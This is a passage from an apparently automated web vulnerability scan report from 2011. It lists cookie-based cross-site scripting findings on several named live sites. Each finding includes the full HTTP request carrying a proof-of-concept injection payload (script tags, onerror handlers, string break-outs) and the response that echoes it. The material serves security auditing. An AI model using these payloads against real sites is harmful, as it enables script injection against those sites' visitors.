Cookie: vsid=Gh9fR1o5MmIq71a17"-alert(1)-"5b90fbcef04

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5012
Date: Sat, 30 Apr 2011 22:18:36 GMT
Connection: close

var psMygbsid = "Gh9fR1o5MmIq71a17"-alert(1)-"5b90fbcef04";
// safe-standard@ie5up.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygbiso = false;
}
if (psMygbiso)
...[SNIP]...

3.180. http://image.providesupport.com/js/hic/safe-textlink.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad017"-alert(1)-"f1167be7650 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201774170&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com
Cookie: vsid=69Yp4BH4IXZtad017"-alert(1)-"f1167be7650

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 4803
Date: Sat, 30 Apr 2011 22:18:36 GMT
Connection: close

var psNjc9sid = "69Yp4BH4IXZtad017"-alert(1)-"f1167be7650";
// safe-textlink@ie5up.js

var psNjc9iso;
try {
   psNjc9iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psNjc9wid != null);
} catch(e) {
   psNjc9iso = false;
}
if (psNjc9iso)
...[SNIP]...

3.181. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 12693<script>alert(1)</script>9f4e02bdbc1 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Ftn.gov%2F&jsref=&rnd=1304123873055 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==12693<script>alert(1)</script>9f4e02bdbc1; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 30 Apr 2011 00:37:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==12693<script>alert(1)</script>9f4e02bdbc1
userid:
</div>
...[SNIP]...

3.182. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d55"><a>b0cb33d534e was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-901854364d55"><a>b0cb33d534e; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sat, 30 Apr 2011 15:09:04 GMT
Connection: close
Content-Length: 370

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-901854364d55"><a>b0cb33d534e%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22);" width="1" height="1" border="0" />
...[SNIP]...

3.183. https://www.nrsservicecenter.com/iApp/ret/content/landing.do [MyNRSSite cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload 65e4f<script>alert(1)</script>549513791a0 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/content/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio45765e4f<script>alert(1)</script>549513791a0; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:57:51 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=751121AC73291073038DA7AE49DFB6BC; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001Cx8w-04q4fTm7WKclkerRyx:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Set-Cookie: MyNRSSite=Ohio45765e4f<script>alert(1)</script>549513791a0; Expires=Tue, 27 Apr 2021 12:57:54 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3474


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio45765e4f<script>alert(1)</script>549513791a0'

</div>
...[SNIP]...

3.184. https://www.nrsservicecenter.com/iApp/ret/landing.do [MyNRSSite cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload 1e0f9<script>alert(1)</script>f6c9dd828c8 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:54:11 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=F214AD8C732810730F1FDFF10C93643E; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001IjeLiKhlfJ4zQmEz19sNNxM:13j9iupo2; Path=/
Set-Cookie: MyNRSSite=Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8; Expires=Tue, 27 Apr 2021 12:55:15 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3369


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8'

</div>
...[SNIP]...

3.185. https://www.nrsservicecenter.com/iApp/ret/showPage.do [MyNRSSite cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload cf001<script>alert(1)</script>db581849878 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457cf001<script>alert(1)</script>db581849878; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:54:54 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=0B8DAA0273291073038DB380FF8A8D55; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00012UsdwHUQoqLfeElOyIGVfNj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3492


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio457cf001<script>alert(1)</script>db581849878'

</div>
...[SNIP]...

3.186. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d9daa"><img src=a onerror=alert(1)>a6ccc200b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=end9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:21 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end9daa"><img src=a onerror=alert(1)>a6ccc200b23">
...[SNIP]...

3.187. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cb2"%3balert(1)//cd290823b76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c1cb2";alert(1)//cd290823b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enc1cb2"%3balert(1)//cd290823b76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENC1CB2";ALERT(1)//CD290823B76\">
...[SNIP]...

3.188. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75aaa"%3balert(1)//0a76fef37a8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 75aaa";alert(1)//0a76fef37a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en75aaa"%3balert(1)//0a76fef37a8; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN75AAA";ALERT(1)//0A76FEF37A8\">
...[SNIP]...

3.189. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 17dbd"><img src=a onerror=alert(1)>abbcf0f134a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en17dbd"><img%20src%3da%20onerror%3dalert(1)>abbcf0f134a; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:56 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
